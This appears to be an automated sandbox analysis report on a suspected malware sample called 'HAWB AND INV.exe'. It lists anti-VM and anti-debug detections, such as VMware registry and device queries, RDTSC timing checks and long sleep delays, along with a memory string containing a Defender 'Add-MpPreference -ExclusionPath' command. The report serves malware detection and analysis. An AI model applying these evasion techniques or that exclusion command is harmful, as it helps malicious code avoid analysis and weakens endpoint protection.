          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\ipconfig.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Yara detected AntiVM3
          Source: Yara match, file source: 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, file source: Process Memory Space: HAWB AND INV.exe PID: 6752, type: MEMORY
          Source: Yara match, file source: 0.2.HAWB AND INV.exe.2d0f5ac.1.raw.unpack, type: UNPACKEDPE
          Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
          Source: C:\Users\user\Desktop\HAWB AND INV.exe WMI Queries: IWbemServices::ExecQuery - ROOT\cimv2 : SELECT * FROM Win32_VideoController
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: HAWB AND INV.exe, 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmp Binary or memory string: WINE_GET_UNIX_FILE_NAME
          Source: HAWB AND INV.exe, 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\HAWB AND INV.exe RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\HAWB AND INV.exe RDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\ipconfig.exe RDTSC instruction interceptor: First address: 00000000001185E4 second address: 00000000001185EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\ipconfig.exe RDTSC instruction interceptor: First address: 000000000011896E second address: 0000000000118974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\HAWB AND INV.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 name: Identifier
          Source: C:\Users\user\Desktop\HAWB AND INV.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
          Source: C:\Users\user\Desktop\HAWB AND INV.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
          Source: C:\Users\user\Desktop\HAWB AND INV.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\HAWB AND INV.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum name: 0
          Source: C:\Users\user\Desktop\HAWB AND INV.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
          Source: C:\Users\user\Desktop\HAWB AND INV.exe Code function: 10_2_004088A0 rdtsc
          Source: C:\Users\user\Desktop\HAWB AND INV.exe Code function: 0_2_009745A8 sldt word ptr [eax]
          Source: C:\Users\user\Desktop\HAWB AND INV.exe Thread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4137
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3031
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4167
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2752
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4731
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1801
          Source: C:\Users\user\Desktop\HAWB AND INV.exe TID: 6756 Thread sleep time: -101846s >= -30000s
          Source: C:\Users\user\Desktop\HAWB AND INV.exe TID: 6796 Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6844 Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6160 Thread sleep count: 4167 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6160 Thread sleep count: 2752 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4532 Thread sleep count: 43 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5536 Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5940 Thread sleep count: 4731 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5940 Thread sleep count: 1801 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5688 Thread sleep count: 47 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6876 Thread sleep time: -22136092888451448s >= -30000s
          Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
          Source: C:\Windows\explorer.exe Last function: Thread delayed
          Source: C:\Windows\SysWOW64\ipconfig.exe Last function: Thread delayed
          Source: C:\Users\user\Desktop\HAWB AND INV.exe Thread delayed: delay time: 101846
          Source: C:\Users\user\Desktop\HAWB AND INV.exe Thread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
          Source: powershell.exe, 00000004.00000003.475227153.00000000059ED000.00000004.00000001.sdmp, powershell.exe, 00000008.00000003.539404811.0000000005332000.00000004.00000001.sdmp Binary or memory string: Hyper-V
          Source: explorer.exe, 0000000B.00000000.410165765.00000000083EB000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 0000000B.00000000.410406652.0000000008430000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 0000000B.00000000.390572167.0000000005D50000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: HAWB AND INV.exe, 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 0000000B.00000002.615205318.00000000062E0000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllte
          Source: explorer.exe, 0000000B.00000000.396565510.00000000063F6000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: HAWB AND INV.exe, 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmp Binary or memory string: VMWARE
          Source: HAWB AND INV.exe, 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmp Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 0000000B.00000000.390572167.0000000005D50000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: HAWB AND INV.exe, 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II
          Source: HAWB AND INV.exe, 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmp Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
          Source: HAWB AND INV.exe, 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmp Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
          Source: HAWB AND INV.exe, 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmp Binary or memory string: vmware
          Source: HAWB AND INV.exe, 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmp Binary or memory string: l%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 0000000B.00000000.410165765.00000000083EB000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00
          Source: HAWB AND INV.exe, 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmp Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
          Source: HAWB AND INV.exe, 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
          Source: explorer.exe, 0000000B.00000000.407965163.00000000082E2000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
          Source: explorer.exe, 0000000B.00000000.390572167.0000000005D50000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 0000000B.00000000.407965163.00000000082E2000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: HAWB AND INV.exe, 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmp Binary or memory string: l"SOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 0000000B.00000000.410406652.0000000008430000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
          Source: powershell.exe, 00000004.00000003.475227153.00000000059ED000.00000004.00000001.sdmp, powershell.exe, 00000008.00000003.539404811.0000000005332000.00000004.00000001.sdmp Binary or memory string: l:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
          Source: explorer.exe, 0000000B.00000000.390572167.0000000005D50000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: explorer.exe, 0000000B.00000002.594031738.000000000095C000.00000004.00000020.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\HAWB AND INV.exe Process queried: DebugPort
          Source: C:\Windows\SysWOW64\ipconfig.exe Process queried: DebugPort
          Source: C:\Users\user\Desktop\HAWB AND INV.exe Code function: 10_2_004088A0 rdtsc
          Source: C:\Users\user\Desktop\HAWB AND INV.exe Code function: 10_2_00409B10 LdrLoadDll,
          Source: C:\Users\user\Desktop\HAWB AND INV.exe Code function: 10_2_0120513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exe Code function: 10_2_011D9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exe Code function: 10_2_011F4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exe Code function: 10_2_011F4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exe Code function: 10_2_011FB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011DB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011DB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011DC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012061A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012061A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012569A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012551BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012551BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012551BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012551BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011FC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0120A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01202990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012641E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011DB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011DB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011DB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0120002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0120002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0120002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0120002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0120002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01257016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01257016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01257016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011EB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011EB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011EB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011EB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012A4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012A4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011F0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011F0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01292073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012A1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012190AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011D9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0120F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0120F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0120F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01253884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01253884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011D58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0126B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0126B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0126B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0126B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0126B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0126B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0129131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011DF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01203B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01203B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011DDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012A8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011DDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01204BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01204BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01204BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012A5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011E1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011E1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0129138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0128D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0120B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01202397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012553CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012553CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011FDBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011F3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011DAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011DAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01214A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01214A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011D5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011D5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011D5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011D5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011E8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0129AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0129AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0128B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0128B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012A8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0121927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011D9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011D9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011D9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011D9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01264257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0129EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0120FAB0 mov eax, dword ptr fs:[00000030h]
